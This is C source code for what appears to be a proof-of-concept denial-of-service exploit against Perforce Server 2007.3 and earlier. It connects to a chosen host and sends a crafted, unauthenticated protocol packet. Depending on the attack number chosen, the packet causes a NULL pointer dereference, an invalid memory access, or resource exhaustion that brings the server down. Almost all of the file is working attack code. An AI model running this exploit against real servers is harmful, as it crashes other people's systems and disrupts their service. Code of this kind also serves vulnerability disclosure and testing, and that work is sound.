/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <time.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
#endif

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



#define VER         "0.1"
#define PORT        1666
#define BUFFSZ      8192



int p4_send(int sd, u8 *data, int datalen);
int putpv(u8 *data, u8 *par, u8 *val);
int getxx(u8 *data, u32 *ret, int bits);
int putxx(u8 *data, u32 num, int bits);
int timeout(int sock, int secs);
u32 resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    int     sd,
            len,
            attack;
    u16     port    = PORT;
    u8      buff[BUFFSZ],
            *p;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "Perforce Server <= 2007.3/143793 multiple vulnerabilities "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\n"
            "Usage: %s <attack> <host> [port(%hu)]\n"
            "\n"
            "Attacks:\n"
            " 1 = NULL pointer vulnerabilities\n"
            " 2 = invalid memory access vulnerabilities\n"
            " 3 = resources consuming and subsequent termination of the server\n"
            "\n", argv[0], port);
        exit(1);
    }

    attack = atoi(argv[1]);

    if(argc > 3) port = atoi(argv[3]);
    peer.sin_addr.s_addr = resolv(argv[2]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n", inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));

    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();
    if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
      < 0) std_err();

    p = buff;
    p += putpv(p, "",               "arg1");    // any empty parameter is an argument for "func"
    p += putpv(p, "",               "arg2");    // arg3,...,argN and so on
    p += putpv(p, "prog",           "P4V");
    p += putpv(p, "client",         "myhostname");
    p += putpv(p, "cwd",            "c:/");
    p += putpv(p, "os",             "NT");
    p += putpv(p, "user",           "I_don't_need_an_account");
    p += putpv(p, "type",           "xxxxxxxxxx");
    p += putpv(p, "status",         "");
    if(attack == 1) {
        p += putpv(p, "token",      "x");
        p += putpv(p, "func",       "dm-LazyCheck");
    } else if(attack == 2) {
        p += putpv(p, "workRec",    "");
        p += putpv(p, "message",    "AAAABBBBCCCC");
        p += putpv(p, "path",       "");
        p += putpv(p, "depotRec",   "");
        p += putpv(p, "handle",     "");
        p += putpv(p, "do",         "");
        p += putpv(p, "func",       "server-DiffFile");
    } else if(attack == 3) {
        p += putpv(p, "workRec",    "");
        p += putpv(p, "message",    "aluigi");  // loop: 0047f3b0-0047f3eb
        p += putpv(p, "path",       "");
        p += putpv(p, "depotRec",   "");
        p += putpv(p, "handle",     "");
        p += putpv(p, "do",         "");
        p += putpv(p, "func",       "server-DiffFile");
    } else {
        printf("\nError: wrong attack number\n");
        exit(1);
    }

    printf("- send malformed packet\n");
    p4_send(sd, buff, p - buff);

    printf("- receive data: ");
    for(;;) {
        if(timeout(sd, 3) < 0) break;
        len = recv(sd, buff, BUFFSZ, 0);
        if(len <= 0) break;
        fputc('.', stdout);
    }

    close(sd);
    printf("\n- done\n");
    return(0);
}



int p4_send(int sd, u8 *data, int datalen) {
    u8      tmp[5];

    putxx(tmp + 1, datalen, 32);
    tmp[0] = tmp[1] ^ tmp[2] ^ tmp[3] ^ tmp[4];
    send(sd, tmp, 5, 0);
    send(sd, data, datalen, 0);
    return(0);
}



int putpv(u8 *data, u8 *par, u8 *val) {
    int     len;
    u8      *p;

    p = data;
    len = strlen(par);
    memcpy(p, par, len + 1);
    p += len + 1;
    len = strlen(val);
    p += putxx(p, len, 32);
    memcpy(p, val, len + 1);
    p += len + 1;
    return(p - data);
}



int getxx(u8 *data, u32 *ret, int bits) {
    u32     num;
    int     i,
            bytes;

    bytes = bits >> 3;
    for(num = i = 0; i < bytes; i++) {
        num |= (data[i] << (i << 3));
    }
    *ret = num;
    return(bytes);
}



int putxx(u8 *data, u32 num, int bits) {
    int     i,
            bytes;

    bytes = bits >> 3;
    for(i = 0; i < bytes; i++) {
        data[i] = (num >> (i << 3)) & 0xff;
    }
    return(bytes);
}



int timeout(int sock, int secs) {
    struct  timeval tout;
    fd_set  fd_read;

    tout.tv_sec  = secs;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    if(select(sock + 1, &fd_read, NULL, NULL, &tout)
      <= 0) return(-1);
    return(0);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32     host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u32 *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


